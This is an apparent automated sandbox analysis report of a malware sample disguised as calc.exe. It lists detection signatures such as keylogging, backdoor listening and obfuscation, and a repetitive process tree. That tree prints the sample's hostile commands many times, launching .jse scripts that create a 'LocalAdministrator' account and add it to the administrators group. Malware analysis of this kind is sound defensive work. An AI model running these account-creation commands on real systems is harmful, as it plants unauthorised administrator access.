Edit tour

Windows Analysis Report
calc.exe

Overview

General Information

Sample name:	calc.exe
Analysis ID:	1523636
MD5:	2f9fdad776d8626f2ce8625211831e91
SHA1:	21d8413eb0d60b36fc249f8025c277b557fefde3
SHA256:	9b66a8ea0f1c64965b06e7a45afbe56f2d4e6d5ef65f32446defccbebe730813
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Adds a new user with administrator rights

Machine Learning detection for sample

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Calculator Usage

Sigma detected: Suspicious Process Parents

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Contains functionality for read data from the clipboard

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Add User to Local Administrators Group

Sigma detected: New User Created Via Net.EXE

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Too many similar processes found

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64_ra

calc.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 6296 cmdline: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6408 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6472 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6436 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6580 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 6236 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 6656 cmdline: "C:\Windows\System32\wscript.exe" mumMT6WOaG.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6708 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5700 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6752 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6920 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 5220 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 2532 cmdline: "C:\Windows\System32\wscript.exe" fhZL0KwyiV.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 1876 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 3008 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 4792 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6188 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 4020 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 4796 cmdline: "C:\Windows\System32\wscript.exe" IDsLsRQlEe.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 7080 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6224 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 3940 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6556 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 456 cmdline: "C:\Windows\System32\wscript.exe" cNs6XgJUw5.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6648 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6964 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6656 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

calc.exe (PID: 5868 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 1224 cmdline: "C:\Windows\System32\wscript.exe" rbLiDVEIXX.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 2696 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 7144 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 7152 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6372 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 6152 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 3940 cmdline: "C:\Windows\System32\wscript.exe" UqWLwYRtxi.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 4108 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5488 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 4300 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6576 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 1088 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 1372 cmdline: "C:\Windows\System32\wscript.exe" iy4J2BVXGi.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6768 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6400 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6628 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 7144 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6172 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 2888 cmdline: "C:\Windows\System32\wscript.exe" G0MZ6GMwly.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 2696 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 1104 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 2532 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6760 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 4204 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 6528 cmdline: "C:\Windows\System32\wscript.exe" nPYwCIjDlS.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6652 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6416 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6176 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6968 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 5712 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 7144 cmdline: "C:\Windows\System32\wscript.exe" fevGSHOMU4.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 2548 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 2348 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6272 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 2932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 3684 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 4580 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 2924 cmdline: "C:\Windows\System32\wscript.exe" jkdKCpQjxW.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 3284 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 2308 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 1788 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 2888 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 988 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 1792 cmdline: "C:\Windows\System32\wscript.exe" iTc0FWDklf.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 4300 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6408 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 3728 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 3008 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 5464 cmdline: "C:\Windows\System32\wscript.exe" Ssbk19MNG3.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 3684 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 3880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6532 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6220 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6288 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 6012 cmdline: "C:\Windows\System32\wscript.exe" R7pPYI1mUq.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6604 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 1876 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 5868 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 2888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5892 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 4896 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 7048 cmdline: "C:\Windows\System32\wscript.exe" xJLmgXOpyA.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 1288 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 4204 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 2464 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 4800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6560 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 7008 cmdline: "C:\Windows\System32\wscript.exe" nmkcc07AEX.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 2212 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5504 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 7080 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6160 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 3388 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 736 cmdline: "C:\Windows\System32\wscript.exe" BqmogIcAUc.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 3688 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 3960 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6056 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 2424 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 1640 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 2060 cmdline: "C:\Windows\System32\wscript.exe" Jtk8zxQOt2.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 2188 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 2876 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 3408 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 2064 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 1848 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 1788 cmdline: "C:\Windows\System32\wscript.exe" PZr1luuECN.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 7012 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 364 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 3560 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 4036 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 3544 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 4372 cmdline: "C:\Windows\System32\wscript.exe" 5BgbSwcYMy.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 4336 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 1360 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 4944 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 4528 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 3008 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 2216 cmdline: "C:\Windows\System32\wscript.exe" 38gtKBXT3l.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6428 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 348 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 2724 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 2932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5108 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 5136 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 4464 cmdline: "C:\Windows\System32\wscript.exe" oiAgAiPmEb.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6288 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5844 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6832 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6600 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 1108 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 2504 cmdline: "C:\Windows\System32\wscript.exe" 0ivQggl30s.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 4008 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 2204 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

